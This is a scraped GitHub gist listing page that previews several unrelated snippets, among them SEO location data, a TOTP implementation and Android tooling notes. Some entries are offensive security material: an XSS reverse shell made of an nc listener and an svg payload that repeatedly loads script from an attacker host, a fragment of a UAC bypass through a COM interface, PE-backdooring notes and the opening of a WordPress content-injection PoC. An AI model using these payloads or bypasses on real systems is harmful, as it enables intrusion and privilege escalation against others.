Skip to content

Instantly share code, notes, and snippets.

View b1naryxx's full-sized avatar

b1nary b1naryxx

16 followers · 36 following
  • root
  • 127.0.0.1
View GitHub Profile
@ominfowave
ominfowave / uule.xlsx
Last active July 19, 2021 17:15
uule seo parameter for google serp location
Criteria ID Name Canonical Name Parent ID Country Code Target Type Status Uule parameter
1000002 Kabul Kabul,Kabul,Afghanistan 9075393 AF City Active w+CAIQICIXS2FidWwsS2FidWwsQWZnaGFuaXN0YW4
1000003 Luanda Luanda,Luanda Province,Angola 9070431 AO City Active w+CAIQICIdTHVhbmRhLEx1YW5kYSBQcm92aW5jZSxBbmdvbGE
1000004 The Valley The Valley,Anguilla 2660 AI City Active w+CAIQICITVGhlIFZhbGxleSxBbmd1aWxsYQ
1000010 Abu Dhabi Abu Dhabi,Abu Dhabi,United Arab Emirates 9041082 AE City Active w+CAIQICIoQWJ1IERoYWJpLEFidSBEaGFiaSxVbml0ZWQgQXJhYiBFbWlyYXRlcw
1000011 Ajman Ajman,Ajman,United Arab Emirates 9047096 AE City Active w+CAIQICIgQWptYW4sQWptYW4sVW5pdGVkIEFyYWIgRW1pcmF0ZXM
1000012 Al Ain Al Ain,Abu Dhabi,United Arab Emirates 9041082 AE City Active w+CAIQICIlQWwgQWluLEFidSBEaGFiaSxVbml0ZWQgQXJhYiBFbWlyYXRlcw
1000013 Dubai Dubai,Dubai,United Arab Emirates 9041083 AE City Active w+CAIQICIgRHViYWksRHViYWksVW5pdGVkIEFyYWIgRW1pcmF0ZXM
1000014 Ras Al-Khaimah Ras Al-Khaimah,Ras al Khaimah,United Arab Emirates 9047098 AE C
@ihack4falafel
ihack4falafel / BH19RegChecker.py
Created January 24, 2019 19:46
Simple python script that sends a text message as soon as BH19 training page goes live!
#!/usr/bin/python
#Python script that send your phone number a text as soon as Black Hat 2019 training goes live using Twilio
#The script can be coupled with cronjob that runs every hour or whatever you may see fit
from twilio.rest import Client
import requests
account_sid = '<your Twilio account SID>'
auth_token = '<your Twilio authentication token>'
client = Client(account_sid, auth_token)
@virtualminds
virtualminds / frida_ssl_read_write.js
Last active October 18, 2018 17:55
frida libmono ssl read
{
onEnter: function (log, args, state) {
soname = Memory.readUtf8String(args[0]);
if(soname.includes('libmono-btls-shared.so')) {
log("libmono-btls-shared.so cargada!");
this.dlopen = true;
this.dlopenMonitor = false;
}
@rcoh
rcoh / otp.py
Last active September 19, 2025 04:44
An implementation of Google Authenticator Compatible 2-factor Codes
"""
An implementation of TOTP as described in https://tools.ietf.org/html/rfc6238#section-4 aka Google Authenticator Style 2-factor Auth
"""
import base64
import datetime
import hashlib
import hmac
import sys
import struct
import time
@api0cradle
api0cradle / akagi_41.c
Created August 16, 2017 07:14 — forked from hfiref0x/akagi_41.c
UAC bypass using CMSTPLUA COM interface
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@mgeeky
mgeeky / msfvenom-reverse-tcp-WaitForSingleObject.md
Last active January 16, 2025 19:33
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for WaitForSingleObject call within modern msfvenom generated payload.

Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents:

@ivanvza
ivanvza / xss_shell.txt
Created February 28, 2017 20:36
XSS Reverse Shell
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
@leonjza
leonjza / inject.py
Last active October 23, 2024 01:06
Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# 2017 - @leonjza
#
# Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# Full bug description: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Usage example:
#
# List available posts:
#
# $ python inject.py http://localhost:8070/
@dmpatel151282
dmpatel151282 / Compile, decompile and sign APK using apktool utility.
Created January 4, 2017 08:31
1. Download latest apktool version.
2. Download the batch file and aapt.exe.
3. Create a folder anywhere in the PC and put all the apktool.jar, aapt.exe and the batch script in that folder.
4. Open command prompt.
5. Navigate to the folder where you placed apktool.jar, batch script and the aapt.exe.
6. Now, you need to install the file using the " IF " command.
7. Type the following command.
apktool if name-of-the-app.apk
@pwlin
pwlin / gist:8a0d01e6428b7a96e2eb
Last active January 4, 2026 23:31
Android : add cert to system store
https://code.google.com/p/android/issues/detail?id=32696#c5
If you have a certificate that is not
trusted by Android, when you add it, it goes in the personal cert store.
When you add a cert in this personal cert store, the system requires a
higher security level to unlock the device. But if you manage to add your
cert to the system store then you don't have this requirement. Obviously,
root is required to add a certificate to the system store, but it is quiet
easy.